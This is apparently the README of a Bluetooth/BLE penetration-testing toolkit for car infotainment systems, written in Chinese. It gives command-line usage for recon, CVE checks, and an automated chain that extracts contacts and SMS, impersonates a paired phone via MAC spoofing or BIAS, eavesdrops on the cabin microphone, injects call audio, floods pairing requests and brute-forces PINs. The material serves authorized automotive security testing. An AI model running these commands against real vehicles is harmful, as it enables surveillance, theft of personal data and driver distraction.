Indspl0it/blue-tap
GitHub: Indspl0it/blue-tap
一款专为汽车车载信息娱乐系统设计的综合性蓝牙与低功耗蓝牙渗透测试工具包。
Stars: 0 | Forks: 0
针对汽车 IVI 系统的 Bluetooth/BLE 渗透测试工具包
作者:Santhosh Ballikonda · v2.0.0 · Python 3.10+ · Linux · GPLv3
## 目录
- [用途](#purpose)
- [架构](#architecture)
- [功能特性](#features)
- [发现与扫描](#1-discovery-and-scanning)
- [侦察](#2-reconnaissance)
- [漏洞评估](#3-vulnerability-assessment)
- [数据提取](#4-data-extraction-pbap--map--at)
- [连接劫持](#5-connection-hijacking)
- [音频拦截](#6-audio-interception-hfp--a2dp)
- [AVRCP 媒体控制](#7-avrcp-media-control)
- [协议 Fuzzing](#8-protocol-fuzzing)
- [拒绝服务](#9-denial-of-service)
- [MAC 欺骗](#10-mac-address-spoofing)
- [自动化与编排](#11-automation-and-orchestration)
- [会话管理与报告](#12-session-management-and-reporting)
- [快速入门](#quick-start)
- [使用指南](#usage-guide)
- [工作流程](#workflows)
- [漏洞 IVI 模拟器](#vulnerable-ivi-simulator)
- [故障排除](#troubleshooting)
- [平台说明](#platform-notes)
- [法律免责声明](#legal-disclaimer)
## 用途
Blue-Tap 是一个综合性的 Bluetooth 和 BLE 渗透测试工具包,专为 **汽车车载信息娱乐 (IVI)** 系统的安全评估而设计。它提供了完整的攻击生命周期——从被动设备发现到主动利用、数据提取和自动化报告生成。
### Blue-Tap 的功能
- **发现** 范围内的 Bluetooth Classic 和 BLE 设备,通过设备类别、名称和服务配置文件识别 IVI 系统
- **指纹识别** 目标设备,确定 Bluetooth 版本、芯片组、支持的配置文件、配对模式和 IO 能力
- **评估漏洞**,包含 20 多项基于证据的检查,涵盖已知 CVE(KNOB、BLURtooth、BIAS、BlueBorne、PerfektBlue、BrakTooth、BLUFFS、Invalid Curve)和配置弱点
- **提取数据**,通过 PBAP(电话簿、通话记录)、MAP(SMS/MMS 消息)、AT 命令(设备信息、电话簿、SMS)和 OBEX Object Push
- **劫持连接**,通过 MAC 欺骗和身份克隆冒充已配对的手机,无需重新配对即可访问 IVI
- **拦截音频**,通过 HFP(通话音频捕获/注入)和 A2DP(媒体流捕获、麦克风窃听)
- **Fuzzing 协议**,采用支持 8 种 Bluetooth 协议、4 种变异策略、崩溃数据库、语料库管理和崩溃最小化的多协议活动引擎
- **生成报告**,输出 HTML 和 JSON 格式,包含漏洞发现、提取数据和 Fuzzing 结果
### 适用人群
- 汽车安全研究人员和渗透测试人员
- 执行 Bluetooth 协议栈评估的 OEM/Tier-1 安全团队
- 测试车辆连接系统的红队
- 研究 Bluetooth 协议漏洞的安全研究人员
### 授权要求
Blue-Tap 专为 **授权安全测试** 设计。在进行任何评估之前,您必须获得车辆/设备所有者的明确书面许可。未经授权对您不拥有或无权测试的设备进行使用是非法的。
## 架构
### 系统概述
```
┌──────────────────────────────────────────────────────────────────────────────┐
│ ATTACKER MACHINE (Kali Linux / Ubuntu) │
│ │
│ ┌────────────────────────────────────────────────────────────────────────┐ │
│ │ Blue-Tap CLI (click) │ │
│ │ │ │
│ │ blue-tap [--session NAME] [--verbose]
[args] │ │
│ │ │ │
│ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ │
│ │ │ Session Mgr │ │ LoggedCommand│ │ Report Gen │ │ │
│ │ │ (session.py) │ │ (cli.py) │ │(generator.py)│ │ │
│ │ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │ │
│ │ │ Auto-logs every command │ │ │
│ │ ▼ ▼ │ │
│ │ sessions// HTML/JSON report from session data │ │
│ │ session.json │ │
│ │ 001_scan.json │ │
│ │ 002_vulnscan.json │ │
│ │ pbap/ map/ audio/ │ │
│ └────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────┐ │
│ │ CORE MODULES │ │
│ │ │ │
│ │ ┌──────────────┐ ┌───────────────┐ ┌──────────────┐ │ │
│ │ │ Scanner │ │ Fingerprint │ │ Spoofer │ │ │
│ │ │ Classic + BLE │ │ LMP version │ │ MAC + Name │ │ │
│ │ │ (scanner.py) │ │ Chipset/Caps │ │ + DevClass │ │ │
│ │ └──────┬───────┘ └──────┬────────┘ └──────┬───────┘ │ │
│ │ │ │ │ │ │
│ │ ┌──────┴──────┐ ┌───────┴────────┐ ┌──────┴───────┐ │ │
│ │ │ SDP Browse │ │ RFCOMM Scan │ │ L2CAP Scan │ │ │
│ │ │ (sdp.py) │ │ (rfcomm_scan) │ │ (l2cap_scan) │ │ │
│ │ └─────────────┘ └────────────────┘ └──────────────┘ │ │
│ │ │ │
│ │ ┌──────────────┐ ┌───────────────┐ ┌──────────────┐ │ │
│ │ │ GATT Enum │ │ HCI Capture │ │ Sniffer │ │ │
│ │ │ (gatt.py) │ │(hci_capture) │ │ nRF / USRP │ │ │
│ │ └──────────────┘ └───────────────┘ └──────────────┘ │ │
│ └─────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────┐ │
│ │ ATTACK MODULES │ │
│ │ │ │
│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │
│ │ │ VulnScan │ │ Hijack │ │ PBAP │ │ MAP │ │ HFP │ │ │
│ │ │ 20+ checks│ │ Full IVI │ │ Phonebook│ │ Messages │ │Call Audio│ │ │
│ │ │ CVE-based │ │ takeover │ │ + Calls │ │ SMS/MMS │ │ SCO link │ │ │
│ │ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │ │
│ │ │ │
│ │ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │ │
│ │ │ A2DP │ │ AVRCP │ │ OPP │ │ BIAS │ │ DoS │ │ │
│ │ │ Media/Mic│ │ Media Ctl│ │ File Push│ │CVE-2020- │ │Pair/Name │ │ │
│ │ │CapturInj │ │ Vol Ramp │ │ vCard │ │ 10135 │ │ Flood │ │ │
│ │ └──────────┘ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │ │
│ │ │ │
│ │ ┌──────────┐ ┌──────────┐ │ │
│ │ │BlueSnarfr│ │ PIN Brute│ │ │
│ │ │ AT Cmds │ │ Legacy │ │ │
│ │ └──────────┘ └──────────┘ │ │
│ └─────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────┐ │
│ │ PROTOCOL FUZZING ENGINE │ │
│ │ │ │
│ │ ┌──────────────────────────────────────────────────────────────────┐ │ │
│ │ │ FuzzCampaign (engine.py) │ │ │
│ │ │ Orchestrates multi-protocol fuzzing with live dashboard │ │ │
│ │ │ Protocol rotation • Stats tracking • Crash detection │ │ │
│ │ └──────────┬───────────────────┬───────────────────┬───────────┘ │ │ │
│ │ │ │ │ │ │ │
│ │ ┌──────────▼──────┐ ┌─────────▼────────┐ ┌────────▼─────────┐ │ │ │
│ │ │ Strategies │ │ Protocol Builders│ │ Transports │ │ │ │
│ │ │ ┌─────────────┐ │ │ ┌──────────────┐ │ │ ┌─────────────┐ │ │ │ │
│ │ │ │ Random Walk │ │ │ │ L2CAP Sig │ │ │ │ L2CAP │ │ │ │ │
│ │ │ │ Coverage │ │ │ │ RFCOMM │ │ │ │ RFCOMM │ │ │ │ │
│ │ │ │ State Machine│ │ │ │ SDP │ │ │ │ BLE (bleak) │ │ │ │ │
│ │ │ │ Targeted │ │ │ │ OBEX │ │ │ └─────────────┘ │ │ │ │
│ │ │ └─────────────┘ │ │ │ ATT/GATT │ │ │ │ │ │ │
│ │ └──────────────────┘ │ │ SMP │ │ └──────────────────┘ │ │ │
│ │ │ │ BNEP │ │ │ │ │
│ │ ┌──────────────────┐ │ │ AT Commands │ │ ┌──────────────────┐ │ │ │
│ │ │ Crash DB │ │ └──────────────┘ │ │ Corpus Mgr │ │ │ │
│ │ │ SQLite storage │ │ │ │ Seed generation │ │ │ │
│ │ │ Severity/Type │ └────────────────────┘ │ Protocol-tagged │ │ │ │
│ │ │ Reproducibility │ └──────────────────┘ │ │ │
│ │ └──────────────────┘ ┌──────────────────┐ ┌──────────────────┐ │ │ │
│ │ │ Minimizer │ │ PCAP Replay │ │ │ │
│ │ ┌──────────────────┐ │ Binary search │ │ btsnoop parser │ │ │ │
│ │ │ Mutators │ │ Delta debug │ │ Frame filter │ │ │ │
│ │ │ Field/Int/Length │ │ Field reducer │ │ Mutation replay │ │ │ │
│ │ │ Protocol/Corpus │ └──────────────────┘ └──────────────────┘ │ │ │
│ │ └──────────────────┘ │ │ │
│ └─────────────────────────────────────────────────────────────────────┘ │ │
│ │
│ ┌──────────────────────────────┐ │
│ │ Bluetooth Adapter (HCI) │ │
│ │ hci0 / hci1 │ │
│ │ BlueZ 5.x + D-Bus │ │
│ └──────────────┬───────────────┘ │
└─────────────────┼───────────────────────────────────────────────────────────┘
│
~~~~~~~~~~~~│~~~~~~~~~~~~ Bluetooth Air (2.4 GHz) ~~~~~~~~~~~~
│
┌─────────────┴────────────────────────────────────────────────┐
│ │
▼ ▼
┌──────────────────────────────┐ ┌──────────────────────────────────┐
│ TARGET IVI SYSTEM │ │ VICTIM'S PHONE │
│ │ │ │
│ Car Infotainment Unit │ │ Paired to IVI via Bluetooth │
│ ┌─────────────────────────┐ │ │ │
│ │ Bluetooth Stack │ │ │ Blue-Tap impersonates this │
│ │ PBAP Server (contacts) │ │ │ phone's MAC address to gain │
│ │ MAP Server (messages) │ │ │ access to the IVI without │
│ │ HFP Audio Gateway │ │ │ re-pairing (hijack attack). │
│ │ A2DP Sink (speakers) │ │ │ │
│ │ AVRCP Target │ │ │ ┌─────────────────────────────┐ │
│ │ OPP Server │ │ │ │ MAC: AA:BB:CC:DD:EE:FF │ │
│ │ SPP / DUN / PAN │ │ │ │ Bonded to IVI │ │
│ │ BLE GATT Services │ │ │ │ Has link key stored │ │
│ └─────────────────────────┘ │ │ └─────────────────────────────┘ │
│ │ │ │
│ SDP Records (8+ services) │ └──────────────────────────────────┘
│ L2CAP PSMs (SDP,RFCOMM,...) │
│ RFCOMM Channels (1-30) │
│ BLE Advertisement + GATT │
└───────────────────────────────┘
```
### 数据流:劫持攻击
```
Attacker IVI (Car) Phone (Victim)
│ │ │
│ 1. scan classic │ │
│ ─────────────────────────>│ Inquiry Response │
│ <─────────────────────────│ "SYNC" / Car Audio │
│ │ │
│ 2. recon sdp/fingerprint │ │
│ ─────────────────────────>│ SDP Browse + LMP Info │
│ <─────────────────────────│ Services, BT version │
│ │ │
│ 3. spoof mac PHONE_MAC │ │
│ (local adapter change) │ │
│ │ │
│ 4. hijack IVI PHONE_MAC │ │
│ ─────────────────────────>│ Connects as "phone" │
│ <─────────────────────────│ Auto-authorized (bond) │
│ │ │
│ 5. PBAP GET phonebook │ │
│ ─────────────────────────>│ OBEX PBAP Session │
│ <─────────────────────────│ vCards (contacts+calls) │
│ │ │
│ 6. MAP GET messages │ │
│ ─────────────────────────>│ OBEX MAP Session │
│ <─────────────────────────│ bMessages (SMS/MMS) │
│ │ │
│ 7. HFP SLC setup │ │
│ ─────────────────────────>│ AT command handshake │
│ <─────────────────────────│ +BRSF, +CIND, OK │
│ │ │
│ 8. report │ │
│ (generates HTML/JSON) │ │
```
### 内部模块依赖
```
cli.py ──────────────────────────────────────────────────────────
│
├── core/
│ ├── adapter.py ← hciconfig, btmgmt, bluetoothctl
│ ├── scanner.py ← hcitool (Classic), bleak (BLE)
│ └── spoofer.py ← bdaddr, hciconfig, btmgmt
│
├── recon/
│ ├── sdp.py ← sdptool, raw L2CAP PSM 1
│ ├── fingerprint.py ← hcitool info, LMP features
│ ├── gatt.py ← bleak (BLE GATT client)
│ ├── rfcomm_scan.py ← socket(BTPROTO_RFCOMM)
│ ├── l2cap_scan.py ← socket(BTPROTO_L2CAP)
│ ├── sniffer.py ← nRF Sniffer, USRP B210
│ └── hci_capture.py ← btmon
│
├── attack/
│ ├── vuln_scanner.py ← recon/* (SDP, RFCOMM, fingerprint)
│ ├── hijack.py ← spoofer + pbap + map + hfp
│ ├── pbap.py ← socket(RFCOMM) + OBEX binary
│ ├── map_client.py ← socket(RFCOMM) + OBEX binary
│ ├── hfp.py ← socket(RFCOMM) + AT commands + SCO
│ ├── a2dp.py ← PulseAudio (pulsectl)
│ ├── avrcp.py ← D-Bus (BlueZ AVRCP interface)
│ ├── bias.py ← L2CAP role-switch manipulation
│ ├── bluesnarfer.py ← socket(RFCOMM) + AT commands
│ ├── dos.py ← pairing flood, l2ping, name flood
│ ├── opp.py ← socket(RFCOMM) + OBEX Push
│ └── pin_brute.py ← D-Bus pairing agent
│
├── fuzz/
│ ├── engine.py ← transport + crash_db + corpus + mutators
│ ├── transport.py ← L2CAP/RFCOMM/BLE socket abstractions
│ ├── crash_db.py ← SQLite3
│ ├── corpus.py ← protocol-tagged seed storage
│ ├── mutators.py ← field/integer/length/corpus mutation
│ ├── minimizer.py ← binary search + ddmin + field reduction
│ ├── pcap_replay.py ← btsnoop v1 parser + replay engine
│ ├── protocols/ ← 8 protocol-specific builders
│ └── strategies/ ← 4 campaign strategies
│
├── report/
│ └── generator.py ← session data → HTML/JSON reports
│
└── utils/
├── output.py ← Rich console (tables, panels, colors)
├── session.py ← JSON-L session logging
├── interactive.py ← Device selection prompts
└── bt_helpers.py ← run_cmd, check_tool, MAC validation
```
## 功能特性
### 1. 发现与扫描
被动和主动发现范围内的 Bluetooth Classic 和 BLE 设备。
| 命令 | 描述 |
|---------|-------------|
| `blue-tap scan classic` | Bluetooth Classic 查询扫描 — 发现 BR/EDR 设备,显示名称、MAC、设备类别、RSSI |
| `blue-tap scan ble` | 使用 bleak 进行 BLE 扫描 — 发现 LE 广播者,显示名称、MAC、服务、制造商数据 |
| `blue-tap scan ble --passive` | 被动 BLE 扫描(不发送 SCAN_REQ)— 更隐蔽,仅收集广播数据 |
| `blue-tap scan all` | 同时进行 Classic + BLE 扫描 |
**核心能力:**
- 设备类别解码(识别 Car Audio、Hands-Free、Phone、Computer 等)
- RSSI 信号强度显示,用于估算距离
- JSON 输出(`-o results.json`)用于脚本管道
- 可配置的扫描持续时间(`-d 30` 表示 30 秒)
- 适配器选择(`-i hci1`)用于多适配器设置
### 2. 侦察
深度服务枚举、设备指纹识别和无线电级捕获。
| 命令 | 描述 |
|---------|-------------|
| `blue-tap recon sdp ` | 浏览所有 SDP 服务记录 — 配置文件、通道、UUID、提供商字符串 |
| `blue-tap recon fingerprint ` | 设备指纹识别 — BT 版本、LMP 特性、芯片组、制造商、能力 |
| `blue-tap recon rfcomm-scan ` | 暴力扫描 RFCOMM 通道 1-30 以查找开放/隐藏服务 |
| `blue-tap recon l2cap-scan ` | 扫描众所周知的 L2CAP PSM 以查找开放服务;`--dynamic` 添加动态范围 |
| `blue-tap recon gatt ` | BLE GATT 服务/特征枚举,包含读/写/通知属性 |
| `blue-tap recon ssp ` | 检查设备是否支持 Secure Simple Pairing |
| `blue-tap recon pairing-mode ` | 检测配对模式(Legacy PIN vs SSP)和 IO 能力 |
| `blue-tap recon capture-start` | 通过 btmon 启动 HCI 流量捕获(保存 btsnoop 格式) |
| `blue-tap recon capture-stop` | 停止 btmon 捕获 |
**高级无线电侦察(需要专用硬件):**
| 命令 | 硬件 | 描述 |
|---------|----------|-------------|
| `blue-tap recon nrf-scan` | nRF52840 dongle | BLE 广播扫描,具备原始 PDU 访问权限 |
| `blue-tap recon nrf-sniff` | nRF52840 dongle | 嗅探 BLE 配对交换(捕获 STK/LTK 协商) |
| `blue-tap recon usrp-scan` | USRP B210 | 在基带级别扫描 BR/EDR piconet |
| `blue-tap recon usrp-follow` | USRP B210 | 跟踪并捕获 BR/EDR piconet 流量 |
| `blue-tap recon usrp-capture` | USRP B210 | 原始 IQ 捕获,用于离线分析 |
| `blue-tap recon crack-key` | — | 使用 Crackle 从捕获的 pcap 中破解 BLE 配对密钥 |
| `blue-tap recon extract-link-key` | — | 从捕获的配对交换中提取 BR/EDR link key |
| `blue-tap recon inject-link-key` | — | 将恢复的 link key 注入 BlueZ 以进行重连 |
### 3. 漏洞评估
基于证据的漏洞扫描器,包含 20 多项检查,涵盖已知 CVE、协议弱点和配置问题。每项发现都包含严重程度、CVE 参考、影响描述、修复建议、状态(confirmed/potential/unverified)和置信度评级。
```
blue-tap vulnscan
blue-tap vulnscan -o findings.json
```
**执行的漏洞检查:**
| 检查项 | CVE(s) | 检测内容 |
|-------|--------|-----------------|
| Service Exposure | — | 敏感 RFCOMM 服务(PBAP/MAP)无需认证质询即可访问 |
| KNOB | CVE-2019-9506 | LMP 密钥长度协商降级(BT < 5.1, pause_encryption) |
| BLURtooth / CTKD | CVE-2020-15802 | 跨传输密钥派生覆盖(BT 4.2-5.0, 双模) |
| PerfektBlue | CVE-2024-45431/32/33/34 | OpenSynergy BlueSDK 漏洞(VW/Audi/Mercedes IVI, 无效 CID 探测) |
| BLUFFS | CVE-2023-24023 | 会话密钥派生降级(BT 4.2-5.4) |
| PIN Pairing Bypass | CVE-2020-26555 | 通过 PIN 响应欺骗进行 BR/EDR 冒充 |
| Invalid Curve | CVE-2018-5383 | SSP/SC 中跳过 ECDH 公钥验证(BT 4.2-5.0) |
| BIAS | CVE-2020-10135 | 通过重连时的角色切换绕过认证 |
| BlueBorne | CVE-2017-1000251 | L2CAP 配置响应缓冲区溢出(kernel < 4.13.1) |
| Pairing Method | — | Legacy PIN vs SSP Just Works vs MITM-protected |
| Writable GATT | — | BLE 特征无需认证即可写入(OTA 更新、诊断) |
| BrakTooth Chipset | — | 针对 BrakTooth 系列漏洞的芯片组识别 |
| EATT Support | — | Enhanced ATT 通道支持和 L2CAP CoC 配置 |
| Hidden RFCOMM | — | RFCOMM 通道开放但未在 SDP 中广播 |
| Encryption Enforcement | — | 服务无需强制加密即可访问 |
| PIN Lockout | — | 缺乏对配对尝试的速率限制 |
| Device Class | — | 识别 Car Audio / Hands-Free 设备类别(IVI 指标) |
| LMP Features | — | 特性标志分析(encryption, SC, LE, dual-mode) |
| Authorization Model | — | 服务授权策略(trust-on-first-use, per-service 等) |
| Automotive Diagnostics | — | 通过 Bluetooth 暴露的 OBD/UDS/诊断服务 |
**发现分类:**
- **状态:** `confirmed`(直接观察到),`potential`(基于版本/启发式),`unverified`(需要主动利用)
- **置信度:** `high`, `medium`, `low`
- **严重程度:** `CRITICAL`, `HIGH`, `MEDIUM`, `LOW`, `INFO`
### 4. 数据提取 (PBAP / MAP / AT)
#### PBAP — Phone Book Access Profile
从 IVI 同步的手机数据中下载电话簿联系人 and 通话记录。
```
blue-tap pbap pull # Pull main phonebook
blue-tap pbap pull -p telecom/ich.vcf # Incoming call history
blue-tap pbap pull -p telecom/och.vcf # Outgoing call history
blue-tap pbap pull -p telecom/mch.vcf # Missed call history
blue-tap pbap pull -p telecom/cch.vcf # Combined call history
blue-tap pbap dump # Dump ALL: contacts + all call logs + favorites + SIM
blue-tap pbap dump -o ./pbap_data/ # Custom output directory
```
**提取内容:**
- vCard 2.1/3.0 联系人(姓名、电话号码、电子邮件、地址、组织)
- 带有时间戳、持续时间和电话号码的通话记录
- SIM 电话簿条目(如果已同步)
- 快速拨号 / 收藏夹
#### MAP — Message Access Profile
下载存储在 IVI 上的 SMS 和 MMS 消息。
```
blue-tap map list # List messages in inbox
blue-tap map list --folder sent # List sent messages
blue-tap map dump # Dump all messages from all folders
blue-tap map dump -o ./messages/ # Custom output directory
```
**消息文件夹:** inbox, sent, draft, deleted, outbox
#### AT Command 提取
通过 RFCOMM 上的 AT 命令直接提取数据(bluesnarfer 风格)。
```
blue-tap at connect # Interactive AT command session
blue-tap at dump # Dump all: phonebook, SMS, device info
blue-tap at snarf # External bluesnarfer binary
```
**通过 AT 可获取的数据:**
- `AT+CPBR` — 电话簿条目
- `AT+CMGL` — SMS 消息
- `AT+CGSN` — IMEI
- `AT+CIMI` — IMSI
- `AT+CBC` — 电池状态
- `AT+CSQ` — 信号强度
### 5. 连接劫持
通过冒充机主的手机完全接管 IVI。
```
blue-tap hijack
blue-tap hijack --phone-name "John's iPhone"
blue-tap hijack --bias # Use BIAS CVE-2020-10135
blue-tap hijack --recon-only # Recon phase only
blue-tap hijack --skip-audio # Skip HFP setup
```
**攻击阶段:**
1. **侦察** — 指纹识别 IVI,枚举 SDP 服务,识别配置文件和通道
2. **冒充** — 欺骗攻击者的 MAC 地址、适配器名称和设备类别以匹配手机
3. **连接** — 以被欺骗的手机身份连接到 IVI;IVI 看到已绑定设备并自动授权
4. **PBAP 提取** — 通过 OBEX PBAP 下载电话簿和通话记录
5. **MAP 提取** — 通过 OBEX MAP 下载 SMS/MMS 消息
6. **音频设置** — 建立 HFP Service Level Connection 以进行通话拦截
**BIAS 模式 (`--bias`):** 当 IVI 验证 link key 并拒绝简单的 MAC 欺骗时,BIAS 攻击(CVE-2020-10135)利用重连期间的角色切换完全绕过认证。
### 6. 音频拦截 (HFP / A2DP)
#### HFP — Hands-Free Profile
通过 SCO(Synchronous Connection-Oriented)链路进行通话音频捕获和注入。
```
blue-tap hfp connect # Establish Service Level Connection (SLC)
blue-tap hfp capture -o call.wav # Capture call audio to WAV
blue-tap hfp inject -f audio.wav # Inject audio into active call
blue-tap hfp at -c "AT+COPS?" # Send raw AT command
blue-tap hfp dtmf -t "1234#" # Send DTMF tones
blue-tap hfp hold -a 2 # Call hold/swap
blue-tap hfp redial # Redial last number
blue-tap hfp voice --activate # Trigger voice assistant
```
A2DP — Advanced Audio Distribution
通过 PulseAudio 进行媒体流捕获、麦克风窃听和音频注入。
```
blue-tap audio devices # List Bluetooth audio sources/sinks
blue-tap audio profile hfp # Switch to HFP profile (mic access)
blue-tap audio profile a2dp # Switch to A2DP profile (media)
blue-tap audio record-mic # Record from car's Bluetooth microphone
blue-tap audio live # Live eavesdrop: car mic → laptop speakers
blue-tap audio capture # Capture A2DP media stream to WAV
blue-tap audio play file.mp3 # Play file through car speakers
blue-tap audio loopback # Route laptop mic → car speakers
blue-tap audio loopback-stop # Stop loopback
blue-tap audio diagnose # Diagnose Bluetooth audio issues
blue-tap audio list # List captured audio files
blue-tap audio playback # Play captured file locally
blue-tap audio review # Interactive audio file review
```
### 7. AVRCP 媒体控制
Audio/Video Remote Control Profile 攻击。
```
blue-tap avrcp play # Send play command
blue-tap avrcp pause # Send pause
blue-tap avrcp stop # Send stop
blue-tap avrcp next # Skip to next track
blue-tap avrcp prev # Skip to previous track
blue-tap avrcp volume -l 127 # Set volume to max
blue-tap avrcp volume-ramp --start 0 --end 127 --step 5
# Gradual volume escalation attack
blue-tap avrcp skip-flood -n 100 # Rapid track skip injection
blue-tap avrcp metadata # Show current track metadata
blue-tap avrcp monitor # Monitor track changes in real-time
```
### 8. 协议 Fuzzing
多协议 Fuzzing 引擎,具备活动管理、崩溃数据库、语料库管理和崩溃最小化功能。
#### Campaign 模式
```
blue-tap fuzz campaign # Fuzz all protocols
blue-tap fuzz campaign -p sdp -p rfcomm # Specific protocols
blue-tap fuzz campaign --strategy targeted # Vulnerability-targeted
blue-tap fuzz campaign --strategy state-machine # State machine exploration
blue-tap fuzz campaign --strategy coverage # Response-guided coverage
blue-tap fuzz campaign --duration 1h --capture # 1 hour + pcap capture
blue-tap fuzz campaign -n 10000 --delay 0.1 # 10K iterations, fast
blue-tap fuzz campaign --resume # Resume previous campaign
```
**Campaign 模式支持的协议:**
| 协议 | 传输层 | Fuzzing 内容 |
|----------|-----------|----------------|
| `sdp` | L2CAP PSM 1 | SDP 服务记录、continuation state、数据元素 |
| `rfcomm` | L2CAP PSM 3 | RFCOMM 帧、PN/MSC/RPN 协商、credits |
| `obex-pbap` | RFCOMM | OBEX PBAP 头部、app parameters、会话状态 |
| `obex-map` | RFCOMM | OBEX MAP 头部、消息列表、文件夹操作 |
| `obex-opp` | RFCOMM | OBEX Object Push 头部、大负载 |
| `at-hfp` | RFCOMM | HFP AT 命令、SLC 握手、codec 协商 |
| `at-phonebook` | RFCOMM | AT+CPBR 电话簿访问命令 |
| `at-sms` | RFCOMM | AT+CMGL/CMGR SMS 命令 |
| `ble-att` | BLE L2CAP | ATT handles、writes、MTU、prepare writes、unknown opcodes |
| `ble-smp` | BLE L2CAP | SMP pairing、key sizes、ECDH curve、sequencing |
| `bnep` | L2CAP PSM 15 | BNEP setup、ethernet frames、filter lists、extensions |
**Fuzzing 策略:**
| 策略 | 描述 |
|----------|-------------|
| `random` | 随机协议轮换和变异选择(默认) |
| `targeted` | 优先考虑已知会触发 CVE 的协议和变异 |
| `coverage` | 跟踪响应模式并偏向产生新响应的变异 |
| `state-machine` | 通过跨测试用例维护会话状态来探索协议状态机 |
#### Protocol-Specific Fuzzers
具有模式选择的深度协议 Fuzzer:
```
blue-tap fuzz l2cap-sig --mode config # L2CAP config option parsing
blue-tap fuzz l2cap-sig --mode echo # L2CAP echo request flooding
blue-tap fuzz rfcomm-raw --mode pn # RFCOMM PN negotiation
blue-tap fuzz rfcomm-raw --mode credits # Credit-based flow control
blue-tap fuzz sdp-deep --mode continuation # SDP continuation state (CVE-2017-0785)
blue-tap fuzz sdp-deep --mode data-elements # SDP data element malformation
blue-tap fuzz obex -p pbap --mode headers # OBEX header parsing
blue-tap fuzz obex -p map --mode path-traversal # OBEX path traversal
blue-tap fuzz ble-att --mode writes # BLE ATT write overflow
blue-tap fuzz ble-att --mode mtu # BLE MTU negotiation
blue-tap fuzz ble-smp --mode curve # Invalid ECDH curve (CVE-2018-5383)
blue-tap fuzz ble-smp --mode sequence # Out-of-sequence SMP
blue-tap fuzz bnep --mode setup # BNEP setup connection (CVE-2017-0781)
blue-tap fuzz bnep --mode filters # BNEP filter list overflow
blue-tap fuzz at-deep --category injection # AT command injection patterns
blue-tap fuzz at-deep --category hfp-slc # HFP SLC handshake fuzzing
```
#### CVE 复现
```
blue-tap fuzz cve --list # List all supported CVE patterns
blue-tap fuzz cve # Run all CVE patterns
blue-tap fuzz cve --cve-id 2017-0785 # BlueBorne SDP overflow
blue-tap fuzz cve --cve-id sweyntooth # SweynTooth BLE patterns
```
#### 崩溃管理
```
blue-tap fuzz crashes list # List all crashes from session
blue-tap fuzz crashes show 1 # Detailed crash info
blue-tap fuzz crashes replay 1 # Replay crash to verify
blue-tap fuzz crashes export # Export crashes to JSON
```
#### 崩溃最小化
将崩溃负载减少到触发 Bug 所需的最小字节数。
```
blue-tap fuzz minimize 1 # Auto-select strategy
blue-tap fuzz minimize 3 --strategy ddmin # Delta debugging
blue-tap fuzz minimize 5 --strategy binary # Binary search reduction
blue-tap fuzz minimize 2 --strategy field # Field-level analysis
```
#### Corpus 管理
```
blue-tap fuzz corpus generate # Generate seed corpus from builders
blue-tap fuzz corpus list # Show corpus stats per protocol
blue-tap fuzz corpus minimize # Deduplicate by content hash
```
#### PCAP 重放
```
blue-tap fuzz replay capture.btsnoop -t --list # Inspect captured frames
blue-tap fuzz replay capture.btsnoop -t # Replay all frames
blue-tap fuzz replay capture.btsnoop -t -p sdp # Filter by protocol
blue-tap fuzz replay capture.btsnoop -t --mutate # Replay with mutations
```
#### Legacy Single-Protocol Fuzzers
```
blue-tap fuzz l2cap # Basic L2CAP fuzzing
blue-tap fuzz rfcomm # Basic RFCOMM fuzzing
blue-tap fuzz at # Basic AT command fuzzing
blue-tap fuzz sdp # SDP continuation probe (CVE-2017-0785)
blue-tap fuzz bss # Bluetooth Stack Smasher (external)
```
### 9. 拒绝服务
```
blue-tap dos pair-flood # Flood with pairing requests
blue-tap dos name-flood # Pair with max-length names (memory exhaustion)
blue-tap dos rate-test # Detect rate limiting on pairing
blue-tap dos pin-brute # Brute-force legacy PIN pairing
blue-tap dos l2ping-flood # L2CAP echo request flood (requires root)
```
### 10. MAC 地址欺骗
```
blue-tap spoof mac # Change adapter MAC address
blue-tap spoof clone # Full identity clone: MAC + name + device class
blue-tap spoof restore # Restore original MAC
```
### 11. 自动化与编排
#### 自动模式
全自动化:发现手机、劫持 IVI、提取所有数据、生成报告。
```
blue-tap auto # Full auto chain
blue-tap auto -d 30 # 30-second phone discovery window
blue-tap auto -o ./auto_results/ # Custom output directory
```
#### 运行模式 (Playbook)
通过单次调用按顺序执行多个命令。
```
# 内联命令
blue-tap -s assessment run \
"scan classic" \
"recon fingerprint TARGET" \
"recon sdp TARGET" \
"vulnscan TARGET" \
"report"
# Playbook 文件 (每行一个命令)
blue-tap -s assessment run --playbook pentest.txt
```
`TARGET` 是一个占位符 — 您将被提示选择一个已发现的设备。
**示例 Playbook (`pentest.txt`):**
```
scan classic
recon fingerprint TARGET
recon sdp TARGET
recon rfcomm-scan TARGET
recon l2cap-scan TARGET
vulnscan TARGET
pbap dump TARGET
map dump TARGET
report
```
### 12. 会话管理与报告
#### 会话
每个命令自动将结构化输出记录到活动会话中。
```
blue-tap -s my_assessment scan classic # Named session
blue-tap -s my_assessment vulnscan # Same session
blue-tap -s my_assessment pbap dump # Same session
blue-tap session list # List all sessions
blue-tap session show my_assessment # Session details
```
**会话目录结构:**
```
sessions/my_assessment/
session.json # Metadata + command log
001_scan_classic.json # Scan results
002_vulnscan.json # Vulnerability findings
003_pbap_dump.json # PBAP extraction log
pbap/ # vCard files
map/ # bMessage files
audio/ # WAV captures
report.html # Generated report
```
#### 报告生成
```
blue-tap report # Report from current session
blue-tap -s my_assessment report # Report from named session
blue-tap report ./hijack_output # Report from specific directory
blue-tap report -f json -o report.json # JSON format
blue-tap report -f html -o report.html # HTML format (default)
```
**HTML 报告包含:**
- 包含严重程度细分的执行摘要
- 漏洞发现表,包含 CVE 参考、影响和修复建议
- 提取数据摘要(联系人数量、消息数量、通话记录)
- Fuzzing 活动结果及崩溃卡片(hex dumps、可复现性状态)
- 深色主题、独立 HTML(无外部依赖)
## 快速入门
